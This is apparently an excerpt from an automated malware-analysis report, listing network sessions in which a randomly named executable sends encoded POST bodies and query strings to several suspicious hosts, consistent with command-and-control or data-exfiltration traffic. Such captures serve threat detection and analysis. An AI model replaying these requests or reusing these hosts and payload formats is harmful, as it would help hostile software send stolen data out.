                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 75 50 47 30 48 47 32 56 76 2b 44 65 5a 76 31 79 45 38 6a 39 64 76 43 71 67 6c 4d 6d 72 6d 74 38 79 6e 5a 6c 44 32 67 45 4a 62 74 73 45 53 6e 6d 6b 6a 39 4e 52 70 66 67 45 4c 68 43 2f 69 7a 2f 43 33 69 43 4d 49 73 39 78 6d 49 50 71 74 2b 6f 4e 4c 51 4e 6b 6c 68 48 30 76 5a 48 4f 44 4f 47 51 72 47 68 76 5a 2b 68 48 52 4e 44 41 41 70 71 4f 42 4e 76 5a 4b 4d 42 67 55 45 4f 7a 50 70 62 50 38 46 33 46 58 6f 30 4e 31 55 7a 71 61 69 64 5a 39 51 56 31 65 41 6f 6b 6e 75 66 50 35 2b 6e 57 63 58 65 49 63 74 2f 7a 72 57 2f 58 37 73 4b 70 61 48 53 2b 79 49 34 68 35 6d 4d 57 63 74 64 32 6c 41 49 6d 61 47 46 5a 4f 69 2b 7a 30 33 5a 4e 49 35 4c 47 2f 54 51 41 72 58 72 7a 6d 34 53 74 55 56 57 62 55 67 36 36 73 44 64 52 2f 44 64 4a 79 62 64 48 4d 4f 42 53 69 67 6d 39 70 6b 6f 7a 74 76 62 58 63 50 66 73 5a 4b 2f 6a 71 41 55 53 44 4f 75 6c 58 71 31 65 4c 41 6a 46 50 7a 36 73 6c 36 37 70 2f 63 35 6f 35 65 6d 46 71 6f 35 35 64 59 6c 4b 46 70 6b 65 4b 6f 57 2f 57 6f 35 68 63 6e 76 52 59 6c 62 64 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh= [TRUNCATED]
                                                              Nov 24, 2024 08:35:11.828428984 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:11 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=JyYbtAAdEs1ovo197JvEUuFBaW9hQZrnrRfAgrKI7ks-1732433711-1.0.1.1-v2B.sNqcuIjiupM9dr4.x8oroRXVoHE1gVeTf7d8oPOy_81a4JgNLRuepI5Zw3jDu3y5lRHWi4FUFHygjAwpRw; path=/; expires=Sun, 24-Nov-24 08:05:11 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b8894bd5c34e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.7 | 49868 | 104.18.73.116 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:13.676418066 CET | 460 | OUT | GET /uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:35:14.772567987 CET | 729 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:14 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=V4V9iiTXtxoVA6SblxTUjakyibblXFVqHmDBC0Ap7Oc-1732433714-1.0.1.1-XAOSysrsred0AHWIpl6ZJgkadRHAANp_1AZhOqP03vq2Bkj26XDgZ1eY3ewpBuH3l3suOS.Af7bsgGN7krqoZg; path=/; expires=Sun, 24-Nov-24 08:05:14 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b89bc96672b6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.7 | 49884 | 66.29.148.78 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:20.736753941 CET | 737 | OUT | POST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 31 4f 4f 56 66 45 30 72 42 44 4a 37 56 4a 41 42 63 64 62 4a 62 36 36 49 6f 35 50 57 70 49 76 57 48 6b 45 79 7a 62 7a 69 78 34 75 36 48 6b 65 4e 34 79 76 61 4b 74 4e 41 78 36 76 74 4a 44 4c 46 2b 71 31 7a 75 54 71 79 73 2f 30 62 6d 78 56 6a 5a 58 53 34 43 43 49 4d 63 47 59 50 54 61 79 68 52 65 4f 44 44 41 36 76 78 37 4e 6b 30 64 41 48 76 68 73 59 73 4c 37 73 6a 65 70 75 4c 2f 67 62 75 6a 57 33 35 6d 66 46 69 70 6a 77 33 70 69 64 4b 66 50 64 31 54 41 65 49 55 5a 57 41 76 71 54 64 54 75 72 34 73 79 69 45 65 66 50 54 69 51 2f 69 7a 65 6f 49 2b 45 32 52 6b 49 6f 38 30 58 65 76 54 78 4f 58 67 3d 3d
                                                              Data Ascii: jp30l4Dh=mQlJ43QWk2uw1OOVfE0rBDJ7VJABcdbJb66Io5PWpIvWHkEyzbzix4u6HkeN4yvaKtNAx6vtJDLF+q1zuTqys/0bmxVjZXS4CCIMcGYPTayhReODDA6vx7Nk0dAHvhsYsL7sjepuL/gbujW35mfFipjw3pidKfPd1TAeIUZWAvqTdTur4syiEefPTiQ/izeoI+E2RkIo80XevTxOXg==
                                                              Nov 24, 2024 08:35:22.037144899 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:21 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:22.037187099 CET | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.7 | 49892 | 66.29.148.78 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:23.396985054 CET | 757 | OUT | POST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 37 57 48 47 63 79 79 5a 62 69 77 34 75 36 4d 45 65 49 38 79 75 57 4b 74 42 79 78 2f 58 74 4a 41 33 46 2b 6f 64 7a 75 67 53 7a 2b 2f 30 64 75 52 56 68 47 6e 53 34 43 43 49 4d 63 47 4d 6c 54 61 71 68 51 75 65 44 43 6c 4f 75 38 62 4e 6a 7a 64 41 48 34 78 73 63 73 4c 36 35 6a 66 30 4c 4c 37 51 62 75 69 6d 33 36 31 48 47 6f 70 6a 4d 7a 70 6a 2f 43 39 6e 52 39 6d 6f 4e 4b 58 68 49 43 74 65 72 63 6c 76 4a 69 4f 2b 4f 61 50 6e 30 58 67 30 4a 31 56 44 64 4b 2f 41 75 63 47 38 4a 6a 44 79 30 69 42 51 4b 42 62 55 6f 74 58 54 41 34 47 55 54 62 66 37 32 4b 49 59 73 45 2b 6b 3d
                                                              Data Ascii: jp30l4Dh=mQlJ43QWk2uw3qKVZjorDjJ6ZpABV9bVb6mIo4b8q67WHGcyyZbiw4u6MEeI8yuWKtByx/XtJA3F+odzugSz+/0duRVhGnS4CCIMcGMlTaqhQueDClOu8bNjzdAH4xscsL65jf0LL7Qbuim361HGopjMzpj/C9nR9moNKXhICterclvJiO+OaPn0Xg0J1VDdK/AucG8JjDy0iBQKBbUotXTA4GUTbf72KIYsE+k=
                                                              Nov 24, 2024 08:35:24.603938103 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:24 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:24.603969097 CET | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.7 | 49900 | 66.29.148.78 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:26.053543091 CET | 1770 | OUT | POST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 6a 57 47 31 55 79 39 59 62 69 69 6f 75 36 42 6b 65 4a 38 79 76 4d 4b 74 5a 32 78 2b 72 39 4a 47 37 46 2f 4c 6c 7a 6f 52 53 7a 6b 76 30 64 69 78 56 67 5a 58 53 49 43 43 59 49 63 47 63 6c 54 61 71 68 51 73 57 44 55 41 36 75 2b 62 4e 6b 30 64 41 62 76 68 73 6b 73 4c 69 70 6a 66 78 2b 4c 49 59 62 75 43 32 33 31 6e 66 47 71 4a 6a 4b 30 70 6a 5a 43 39 36 50 39 67 4d 2f 4b 57 46 32 43 74 6d 72 64 54 65 30 6e 73 71 57 4a 4a 72 43 63 32 6f 4a 33 56 54 70 53 4d 70 58 57 45 6f 34 69 52 75 43 6b 48 77 44 44 74 64 6f 77 58 62 4d 34 6e 67 59 64 72 75 6e 62 62 45 58 47 4a 54 37 6d 37 51 54 75 31 68 42 46 48 62 6f 62 4a 6d 2b 33 44 41 54 52 50 6b 6f 6b 4f 7a 36 69 55 61 2f 34 53 38 39 58 77 47 43 6b 71 77 56 4d 38 31 44 68 4a 51 55 51 56 67 63 37 34 4a 37 41 6e 4f 38 50 33 63 4f 50 48 32 6b 43 65 34 32 74 58 48 6c 30 30 6a 4b 33 41 42 38 30 70 62 48 53 74 4d 4b 47 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh= [TRUNCATED]
                                                              Nov 24, 2024 08:35:27.304543972 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:27 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:27.304569960 CET | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.7 | 49907 | 66.29.148.78 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:35:28.704195976 CET | 464 | OUT | GET /o7bo/?jp30l4Dh=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33pblwowpnCmWgEXw5Rhc3WsmHQKO6UjX33qMhz5kj31YRr7iTj/VwMpww&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:35:29.960447073 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:29 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:29.960505962 CET | 224 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting co
                                                              Nov 24, 2024 08:35:29.960515976 CET | 92 | IN | Data Raw: 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64
                                                              Data Ascii: mpany and, as such, has no control over content found on this site.</p></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
9           192.168.2.7  49923        207.148.38.19   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:36.389164925 CET  716                OUT        POST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
